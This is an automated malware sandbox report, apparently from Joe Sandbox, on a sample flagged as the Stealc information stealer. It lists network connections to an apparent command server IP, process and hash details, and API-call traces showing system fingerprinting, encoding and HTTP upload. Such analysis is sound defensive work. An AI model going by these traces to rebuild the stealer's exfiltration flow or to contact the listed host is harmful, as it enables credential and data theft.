Dec 23, 2024 07:58:48.694458008 CET | 443 | 49723 | 135.181.65.216 | 192.168.2.9
Dec 23, 2024 07:58:48.694540024 CET | 49723 | 443 | 192.168.2.9 | 135.181.65.216
Dec 23, 2024 07:58:48.694829941 CET | 49723 | 443 | 192.168.2.9 | 135.181.65.216
Dec 23, 2024 07:58:48.694843054 CET | 443 | 49723 | 135.181.65.216 | 192.168.2.9
Dec 23, 2024 07:58:53.397090912 CET | 443 | 49723 | 135.181.65.216 | 192.168.2.9
Dec 23, 2024 07:58:53.397186995 CET | 49723 | 443 | 192.168.2.9 | 135.181.65.216
Dec 23, 2024 07:58:53.397301912 CET | 49723 | 443 | 192.168.2.9 | 135.181.65.216
Dec 23, 2024 07:58:53.397345066 CET | 443 | 49723 | 135.181.65.216 | 192.168.2.9
Dec 23, 2024 07:58:53.398099899 CET | 49734 | 443 | 192.168.2.9 | 135.181.65.216
Dec 23, 2024 07:58:53.398169041 CET | 443 | 49734 | 135.181.65.216 | 192.168.2.9
Dec 23, 2024 07:58:53.398283958 CET | 49734 | 443 | 192.168.2.9 | 135.181.65.216
Dec 23, 2024 07:58:53.398360014 CET | 49734 | 443 | 192.168.2.9 | 135.181.65.216
Dec 23, 2024 07:58:53.398406029 CET | 443 | 49734 | 135.181.65.216 | 192.168.2.9
Dec 23, 2024 07:58:53.398503065 CET | 49734 | 443 | 192.168.2.9 | 135.181.65.216
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 07:58:39.600608110 CET | 1.1.1.1 | 192.168.2.9 | 0x6ebf | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 07:58:39.600608110 CET | 1.1.1.1 | 192.168.2.9 | 0x6ebf | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Target ID: 0
Start time: 01:58:42
Start date: 23/12/2024
Path: C:\Users\user\Desktop\stealcy11.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\stealcy11.exe"
Imagebase: 0x8e0000
File size: 245'760 bytes
MD5 hash: 004431FC72FC1228ABF10E298EFA0271
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000000.1341588473.000000000090B000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1847814103.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 6
Start time: 01:59:05
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 7784 -s 1384
Imagebase: 0x650000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                  Execution Graph

                                  Execution Coverage:19.1%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:26.2%
                                  Total number of Nodes:1290
                                  Total number of Limit Nodes:33
8e3d1c 6023->6024 6025 8e4980 34 API calls 6024->6025 6026 8e3d32 6025->6026 6027 8e4980 34 API calls 6026->6027 6028 8e3d48 6027->6028 6029 8e4980 34 API calls 6028->6029 6030 8e3d5e 6029->6030 6031 8e4980 34 API calls 6030->6031 6032 8e3d74 6031->6032 6033 8e4980 34 API calls 6032->6033 6034 8e3d8d 6033->6034 6035 8e4980 34 API calls 6034->6035 6036 8e3da3 6035->6036 6037 8e4980 34 API calls 6036->6037 6038 8e3db9 6037->6038 6039 8e4980 34 API calls 6038->6039 6040 8e3dcf 6039->6040 6041 8e4980 34 API calls 6040->6041 6042 8e3de5 6041->6042 6043 8e4980 34 API calls 6042->6043 6044 8e3dfb 6043->6044 6045 8e4980 34 API calls 6044->6045 6046 8e3e14 6045->6046 6047 8e4980 34 API calls 6046->6047 6048 8e3e2a 6047->6048 6049 8e4980 34 API calls 6048->6049 6050 8e3e40 6049->6050 6051 8e4980 34 API calls 6050->6051 6052 8e3e56 6051->6052 6053 8e4980 34 API calls 6052->6053 6054 8e3e6c 6053->6054 6055 8e4980 34 API calls 6054->6055 6056 8e3e82 6055->6056 6057 8e4980 34 API calls 6056->6057 6058 8e3e9b 6057->6058 6059 8e4980 34 API calls 6058->6059 6060 8e3eb1 6059->6060 6061 8e4980 34 API calls 6060->6061 6062 8e3ec7 6061->6062 6063 8e4980 34 API calls 6062->6063 6064 8e3edd 6063->6064 6065 8e4980 34 API calls 6064->6065 6066 8e3ef3 6065->6066 6067 8e4980 34 API calls 6066->6067 6068 8e3f09 6067->6068 6069 8e4980 34 API calls 6068->6069 6070 8e3f22 6069->6070 6071 8e4980 34 API calls 6070->6071 6072 8e3f38 6071->6072 6073 8e4980 34 API calls 6072->6073 6074 8e3f4e 6073->6074 6075 8e4980 34 API calls 6074->6075 6076 8e3f64 6075->6076 6077 8e4980 34 API calls 6076->6077 6078 8e3f7a 6077->6078 6079 8e4980 34 API calls 6078->6079 6080 8e3f90 6079->6080 6081 8e4980 34 API calls 6080->6081 6082 8e3fa9 6081->6082 6083 8e4980 34 API calls 6082->6083 6084 8e3fbf 6083->6084 6085 8e4980 34 API calls 6084->6085 6086 8e3fd5 6085->6086 6087 8e4980 34 API calls 6086->6087 6088 8e3feb 6087->6088 6089 8e4980 34 API calls 6088->6089 6090 8e4001 6089->6090 6091 8e4980 34 API calls 
6090->6091 6092 8e4017 6091->6092 6093 8e4980 34 API calls 6092->6093 6094 8e4030 6093->6094 6095 8e4980 34 API calls 6094->6095 6096 8e4046 6095->6096 6097 8e4980 34 API calls 6096->6097 6098 8e405c 6097->6098 6099 8e4980 34 API calls 6098->6099 6100 8e4072 6099->6100 6101 8e4980 34 API calls 6100->6101 6102 8e4088 6101->6102 6103 8e4980 34 API calls 6102->6103 6104 8e409e 6103->6104 6105 8e4980 34 API calls 6104->6105 6106 8e40b7 6105->6106 6107 8e4980 34 API calls 6106->6107 6108 8e40cd 6107->6108 6109 8e4980 34 API calls 6108->6109 6110 8e40e3 6109->6110 6111 8e4980 34 API calls 6110->6111 6112 8e40f9 6111->6112 6113 8e4980 34 API calls 6112->6113 6114 8e410f 6113->6114 6115 8e4980 34 API calls 6114->6115 6116 8e4125 6115->6116 6117 8e4980 34 API calls 6116->6117 6118 8e413e 6117->6118 6119 8e4980 34 API calls 6118->6119 6120 8e4154 6119->6120 6121 8e4980 34 API calls 6120->6121 6122 8e416a 6121->6122 6123 8e4980 34 API calls 6122->6123 6124 8e4180 6123->6124 6125 8e4980 34 API calls 6124->6125 6126 8e4196 6125->6126 6127 8e4980 34 API calls 6126->6127 6128 8e41ac 6127->6128 6129 8e4980 34 API calls 6128->6129 6130 8e41c5 6129->6130 6131 8e4980 34 API calls 6130->6131 6132 8e41db 6131->6132 6133 8e4980 34 API calls 6132->6133 6134 8e41f1 6133->6134 6135 8e4980 34 API calls 6134->6135 6136 8e4207 6135->6136 6137 8e4980 34 API calls 6136->6137 6138 8e421d 6137->6138 6139 8e4980 34 API calls 6138->6139 6140 8e4233 6139->6140 6141 8e4980 34 API calls 6140->6141 6142 8e424c 6141->6142 6143 8e4980 34 API calls 6142->6143 6144 8e4262 6143->6144 6145 8e4980 34 API calls 6144->6145 6146 8e4278 6145->6146 6147 8e4980 34 API calls 6146->6147 6148 8e428e 6147->6148 6149 8e4980 34 API calls 6148->6149 6150 8e42a4 6149->6150 6151 8e4980 34 API calls 6150->6151 6152 8e42ba 6151->6152 6153 8e4980 34 API calls 6152->6153 6154 8e42d3 6153->6154 6155 8e4980 34 API calls 6154->6155 6156 8e42e9 6155->6156 6157 8e4980 34 API calls 6156->6157 6158 8e42ff 6157->6158 6159 8e4980 34 API 
calls 6158->6159 6160 8e4315 6159->6160 6161 8e4980 34 API calls 6160->6161 6162 8e432b 6161->6162 6163 8e4980 34 API calls 6162->6163 6164 8e4341 6163->6164 6165 8e4980 34 API calls 6164->6165 6166 8e435a 6165->6166 6167 8e4980 34 API calls 6166->6167 6168 8e4370 6167->6168 6169 8e4980 34 API calls 6168->6169 6170 8e4386 6169->6170 6171 8e4980 34 API calls 6170->6171 6172 8e439c 6171->6172 6173 8e4980 34 API calls 6172->6173 6174 8e43b2 6173->6174 6175 8e4980 34 API calls 6174->6175 6176 8e43c8 6175->6176 6177 8e4980 34 API calls 6176->6177 6178 8e43e1 6177->6178 6179 8e4980 34 API calls 6178->6179 6180 8e43f7 6179->6180 6181 8e4980 34 API calls 6180->6181 6182 8e440d 6181->6182 6183 8e4980 34 API calls 6182->6183 6184 8e4423 6183->6184 6185 8e4980 34 API calls 6184->6185 6186 8e4439 6185->6186 6187 8e4980 34 API calls 6186->6187 6188 8e444f 6187->6188 6189 8e4980 34 API calls 6188->6189 6190 8e4468 6189->6190 6191 8e4980 34 API calls 6190->6191 6192 8e447e 6191->6192 6193 8e4980 34 API calls 6192->6193 6194 8e4494 6193->6194 6195 8e4980 34 API calls 6194->6195 6196 8e44aa 6195->6196 6197 8e4980 34 API calls 6196->6197 6198 8e44c0 6197->6198 6199 8e4980 34 API calls 6198->6199 6200 8e44d6 6199->6200 6201 8e4980 34 API calls 6200->6201 6202 8e44ef 6201->6202 6203 8e4980 34 API calls 6202->6203 6204 8e4505 6203->6204 6205 8e4980 34 API calls 6204->6205 6206 8e451b 6205->6206 6207 8e4980 34 API calls 6206->6207 6208 8e4531 6207->6208 6209 8e4980 34 API calls 6208->6209 6210 8e4547 6209->6210 6211 8e4980 34 API calls 6210->6211 6212 8e455d 6211->6212 6213 8e4980 34 API calls 6212->6213 6214 8e4576 6213->6214 6215 8e4980 34 API calls 6214->6215 6216 8e458c 6215->6216 6217 8e4980 34 API calls 6216->6217 6218 8e45a2 6217->6218 6219 8e4980 34 API calls 6218->6219 6220 8e45b8 6219->6220 6221 8e4980 34 API calls 6220->6221 6222 8e45ce 6221->6222 6223 8e4980 34 API calls 6222->6223 6224 8e45e4 6223->6224 6225 8e4980 34 API calls 6224->6225 6226 8e45fd 6225->6226 6227 8e4980 
34 API calls 6226->6227 6228 8e4613 6227->6228 6229 8e4980 34 API calls 6228->6229 6230 8e4629 6229->6230 6231 8e4980 34 API calls 6230->6231 6232 8e463f 6231->6232 6233 8e4980 34 API calls 6232->6233 6234 8e4655 6233->6234 6235 8e4980 34 API calls 6234->6235 6236 8e466b 6235->6236 6237 8e4980 34 API calls 6236->6237 6238 8e4684 6237->6238 6239 8e4980 34 API calls 6238->6239 6240 8e469a 6239->6240 6241 8e4980 34 API calls 6240->6241 6242 8e46b0 6241->6242 6243 8e4980 34 API calls 6242->6243 6244 8e46c6 6243->6244 6245 8e4980 34 API calls 6244->6245 6246 8e46dc 6245->6246 6247 8e4980 34 API calls 6246->6247 6248 8e46f2 6247->6248 6249 8e4980 34 API calls 6248->6249 6250 8e470b 6249->6250 6251 8e4980 34 API calls 6250->6251 6252 8e4721 6251->6252 6253 8e4980 34 API calls 6252->6253 6254 8e4737 6253->6254 6255 8e4980 34 API calls 6254->6255 6256 8e474d 6255->6256 6257 8e4980 34 API calls 6256->6257 6258 8e4763 6257->6258 6259 8e4980 34 API calls 6258->6259 6260 8e4779 6259->6260 6261 8e4980 34 API calls 6260->6261 6262 8e4792 6261->6262 6263 8e4980 34 API calls 6262->6263 6264 8e47a8 6263->6264 6265 8e4980 34 API calls 6264->6265 6266 8e47be 6265->6266 6267 8e4980 34 API calls 6266->6267 6268 8e47d4 6267->6268 6269 8e4980 34 API calls 6268->6269 6270 8e47ea 6269->6270 6271 8e4980 34 API calls 6270->6271 6272 8e4800 6271->6272 6273 8e4980 34 API calls 6272->6273 6274 8e4819 6273->6274 6275 8e4980 34 API calls 6274->6275 6276 8e482f 6275->6276 6277 8e4980 34 API calls 6276->6277 6278 8e4845 6277->6278 6279 8e4980 34 API calls 6278->6279 6280 8e485b 6279->6280 6281 8e4980 34 API calls 6280->6281 6282 8e4871 6281->6282 6283 8e4980 34 API calls 6282->6283 6284 8e4887 6283->6284 6285 8e4980 34 API calls 6284->6285 6286 8e48a0 6285->6286 6287 8e4980 34 API calls 6286->6287 6288 8e48b6 6287->6288 6289 8e4980 34 API calls 6288->6289 6290 8e48cc 6289->6290 6291 8e4980 34 API calls 6290->6291 6292 8e48e2 6291->6292 6293 8e4980 34 API calls 6292->6293 6294 8e48f8 6293->6294 6295 
8e4980 34 API calls 6294->6295 6296 8e490e 6295->6296 6297 8e4980 34 API calls 6296->6297 6298 8e4927 6297->6298 6299 8e4980 34 API calls 6298->6299 6300 8e493d 6299->6300 6301 8e4980 34 API calls 6300->6301 6302 8e4953 6301->6302 6303 8e4980 34 API calls 6302->6303 6304 8e4969 6303->6304 5289 902820 GetProcessHeap HeapAlloc 5296 9028b0 GetProcessHeap HeapAlloc RegOpenKeyExA 5289->5296 5291 902849 5292 902850 5291->5292 5293 90285a RegOpenKeyExA 5291->5293 5294 902892 RegCloseKey 5293->5294 5295 90287b RegQueryValueExA 5293->5295 5295->5294 5297 9028f5 RegQueryValueExA 5296->5297 5298 90290b RegCloseKey 5296->5298 5297->5298 5299 902920 5298->5299 5299->5291 5299->5299 5482 9026e0 GetWindowsDirectoryA 5483 902725 5482->5483 5484 90272c GetVolumeInformationA 5482->5484 5483->5484 5485 90278c GetProcessHeap HeapAlloc 5484->5485 5487 9027c2 5485->5487 5488 9027c6 wsprintfA 5485->5488 5491 907210 5487->5491 5488->5487 5492 907216 5491->5492 5493 902800 5492->5493 5494 90722c lstrcpy 5492->5494 5494->5493 6305 8e5570 GetProcessHeap RtlAllocateHeap InternetOpenA InternetOpenUrlA 6306 8e5627 InternetCloseHandle InternetCloseHandle 6305->6306 6307 8e55d1 6305->6307 6311 8e563f 6306->6311 6308 8e55d8 InternetReadFile 6307->6308 6309 8e5623 6307->6309 6310 8e5600 LdrInitializeThunk 6307->6310 6308->6307 6308->6309 6309->6306 6310->6307 6310->6310 6407 8fef30 6408 8fef50 6407->6408 6409 8fef68 6408->6409 6410 8fef60 lstrcpy 6408->6410 6415 8e1410 6409->6415 6410->6409 6414 8fef7e 6416 8e1510 4 API calls 6415->6416 6417 8e141b 6416->6417 6418 8e1435 lstrcpy 6417->6418 6419 8e143d 6417->6419 6418->6419 6420 8e1457 lstrcpy 6419->6420 6421 8e145f 6419->6421 6420->6421 6422 8e1479 lstrcpy 6421->6422 6423 8e1481 6421->6423 6422->6423 6424 8e14e5 6423->6424 6425 8e14dd lstrcpy 6423->6425 6426 8e56c0 6424->6426 6425->6424 6427 8e56e0 6426->6427 6428 8e56f5 6427->6428 6429 8e56ed lstrcpy 6427->6429 6430 8e4ae0 5 API calls 6428->6430 6429->6428 6431 8e5700 6430->6431 6574 904090 
6431->6574 6433 8e5736 lstrlenA 6434 904090 4 API calls 6433->6434 6435 8e5755 6434->6435 6436 8e577e lstrcpy 6435->6436 6437 8e578a 6435->6437 6436->6437 6438 8e57bd lstrcpy 6437->6438 6439 8e57c9 6437->6439 6438->6439 6440 8e57ed lstrcpy 6439->6440 6441 8e57f9 6439->6441 6440->6441 6442 8e5822 lstrcpy 6441->6442 6443 8e582e 6441->6443 6442->6443 6444 8e585c lstrcpy 6443->6444 6445 8e5868 InternetOpenA StrCmpCA 6443->6445 6444->6445 6446 8e589c 6445->6446 6447 8e5f34 InternetCloseHandle 6446->6447 6448 903e10 3 API calls 6446->6448 6466 8e5f6a 6447->6466 6449 8e58b6 6448->6449 6450 8e58de lstrcpy lstrcatA 6449->6450 6451 8e58f3 6449->6451 6450->6451 6452 8e5912 lstrcpy 6451->6452 6453 8e591a 6451->6453 6452->6453 6454 8e5929 lstrlenA 6453->6454 6455 8e5941 6454->6455 6456 8e594e lstrcpy lstrcatA 6455->6456 6458 8e5962 6455->6458 6456->6458 6457 8e598f lstrlenA 6459 8e59a5 6457->6459 6458->6457 6460 8e597c lstrcpy lstrcatA 6458->6460 6461 8e59af lstrcpy lstrcatA 6459->6461 6462 8e59c3 6459->6462 6460->6457 6461->6462 6463 8e59e2 lstrcpy 6462->6463 6464 8e59ea 6462->6464 6463->6464 6465 8e59ff lstrlenA 6464->6465 6467 8e5a1a 6465->6467 6466->6414 6468 8e5a2b lstrcpy lstrcatA 6467->6468 6469 8e5a3b 6467->6469 6468->6469 6470 8e5a59 lstrcpy lstrcatA 6469->6470 6471 8e5a6c 6469->6471 6470->6471 6472 8e5a8a lstrcpy 6471->6472 6473 8e5a92 6471->6473 6472->6473 6474 8e5aa0 InternetConnectA 6473->6474 6475 8e5f2e 6474->6475 6476 8e5acf HttpOpenRequestA 6474->6476 6475->6447 6477 8e5b0b 6476->6477 6478 8e5f27 InternetCloseHandle 6476->6478 6479 907340 3 API calls 6477->6479 6478->6475 6480 8e5b1b 6479->6480 6481 9072b0 lstrcpy 6480->6481 6482 8e5b24 6481->6482 6483 9072f0 2 API calls 6482->6483 6484 8e5b37 6483->6484 6485 9072b0 lstrcpy 6484->6485 6486 8e5b40 6485->6486 6487 907340 3 API calls 6486->6487 6488 8e5b55 6487->6488 6489 9072b0 lstrcpy 6488->6489 6490 8e5b5e 6489->6490 6491 907340 3 API calls 6490->6491 6492 8e5b74 6491->6492 6493 9072b0 lstrcpy 6492->6493 6494 
8e5b7d 6493->6494 6495 907340 3 API calls 6494->6495 6496 8e5b93 6495->6496 6497 9072b0 lstrcpy 6496->6497 6498 8e5b9c 6497->6498 6499 907340 3 API calls 6498->6499 6500 8e5bb1 6499->6500 6501 9072b0 lstrcpy 6500->6501 6502 8e5bba 6501->6502 6503 9072f0 2 API calls 6502->6503 6504 8e5bcd 6503->6504 6505 9072b0 lstrcpy 6504->6505 6506 8e5bd6 6505->6506 6507 907340 3 API calls 6506->6507 6508 8e5beb 6507->6508 6509 9072b0 lstrcpy 6508->6509 6510 8e5bf4 6509->6510 6511 907340 3 API calls 6510->6511 6512 8e5c09 6511->6512 6513 9072b0 lstrcpy 6512->6513 6514 8e5c12 6513->6514 6515 9072f0 2 API calls 6514->6515 6516 8e5c25 6515->6516 6517 9072b0 lstrcpy 6516->6517 6518 8e5c2e 6517->6518 6519 907340 3 API calls 6518->6519 6520 8e5c43 6519->6520 6521 9072b0 lstrcpy 6520->6521 6522 8e5c4c 6521->6522 6523 907340 3 API calls 6522->6523 6524 8e5c62 6523->6524 6525 9072b0 lstrcpy 6524->6525 6526 8e5c6b 6525->6526 6527 907340 3 API calls 6526->6527 6528 8e5c81 6527->6528 6529 9072b0 lstrcpy 6528->6529 6530 8e5c8a 6529->6530 6531 907340 3 API calls 6530->6531 6532 8e5c9f 6531->6532 6533 9072b0 lstrcpy 6532->6533 6534 8e5ca8 6533->6534 6535 907340 3 API calls 6534->6535 6536 8e5cbb 6535->6536 6537 9072b0 lstrcpy 6536->6537 6538 8e5cc4 6537->6538 6539 907340 3 API calls 6538->6539 6540 8e5cd9 6539->6540 6541 9072b0 lstrcpy 6540->6541 6542 8e5ce2 6541->6542 6543 907340 3 API calls 6542->6543 6544 8e5cf7 6543->6544 6545 9072b0 lstrcpy 6544->6545 6546 8e5d00 6545->6546 6547 9072f0 2 API calls 6546->6547 6548 8e5d13 6547->6548 6549 9072b0 lstrcpy 6548->6549 6550 8e5d1c 6549->6550 6551 907340 3 API calls 6550->6551 6552 8e5d31 6551->6552 6553 9072b0 lstrcpy 6552->6553 6554 8e5d3a 6553->6554 6555 907340 3 API calls 6554->6555 6556 8e5d50 6555->6556 6557 9072b0 lstrcpy 6556->6557 6558 8e5d59 6557->6558 6559 907340 3 API calls 6558->6559 6560 8e5d6f 6559->6560 6561 9072b0 lstrcpy 6560->6561 6562 8e5d78 6561->6562 6563 907340 3 API calls 6562->6563 6564 8e5d8d 6563->6564 6565 9072b0 lstrcpy 
6564->6565 6566 8e5d96 6565->6566 6567 8e5d9e 14 API calls 6566->6567 6568 8e5f1a InternetCloseHandle 6567->6568 6572 8e5e6a 6567->6572 6568->6478 6569 8e5e7b lstrlenA 6569->6572 6570 8e5eac lstrcpy lstrcatA 6570->6572 6571 8e5ee9 lstrcpy 6571->6572 6572->6568 6572->6569 6572->6570 6572->6571 6573 8e5ef8 InternetReadFile 6572->6573 6573->6568 6573->6572 6575 9040a0 CryptBinaryToStringA 6574->6575 6576 90409a 6574->6576 6575->6576 6577 9040b7 GetProcessHeap HeapAlloc 6575->6577 6576->6433 6577->6576 6578 9040d2 CryptBinaryToStringA 6577->6578 6578->6433
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E4BAF
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E4C02
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E4C35
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E4C65
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E4CA3
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E4CD6
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008E4CE6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$InternetOpen
                                  • String ID: "$------
                                  • API String ID: 2041821634-2370822465
                                  • Opcode ID: ae8dcca9af472f32055079f92bb68bc62b5b787b907d158f2cde49efe1371428
                                  • Instruction ID: f5f5f25b3c8dd4bf35211fb52bc38923f7d9979922704d9cd902c57807a63d88
                                  • Opcode Fuzzy Hash: ae8dcca9af472f32055079f92bb68bc62b5b787b907d158f2cde49efe1371428
                                  • Instruction Fuzzy Hash: 54527D31D016969FCB20ABB9CC49B9EBBB9FF46310F155024F909E7251DB70ED428BA1

                                  Control-flow Graph

                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E56EF
                                  • lstrlenA.KERNEL32(?), ref: 008E5742
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E5784
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E57C3
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E57F3
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E5828
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: ------$"$--$------
                                  • API String ID: 367037083-1406108388
                                  • Opcode ID: 37f2801e25dee3c4c1f79befccc628394c0ecd4c01d16ef96ba0ba8b28a42e02
                                  • Instruction ID: c996238f9c8e91e364bc124ee015fd3e031eb263dfbdf2029869d2797499723f
                                  • Opcode Fuzzy Hash: 37f2801e25dee3c4c1f79befccc628394c0ecd4c01d16ef96ba0ba8b28a42e02
                                  • Instruction Fuzzy Hash: 28426A31E006999FCB10EBB9CC45AAFBBB9FF49314F054424BA05E7252DE74AD028BD1

                                  Control-flow Graph

                                  APIs
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4994
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E499B
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E49A2
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E49A9
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E49B0
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 008E49BB
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 008E49C2
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E49D2
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E49D9
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E49E0
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E49E7
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E49EE
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E49F9
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A00
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A07
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A0E
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A15
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A2B
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A32
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A39
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A40
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A47
                                  • strlen.MSVCRT ref: 008E4A4F
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A73
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A7A
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A81
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A88
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A8F
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A9F
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4AA6
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4AAD
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4AB4
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4ABB
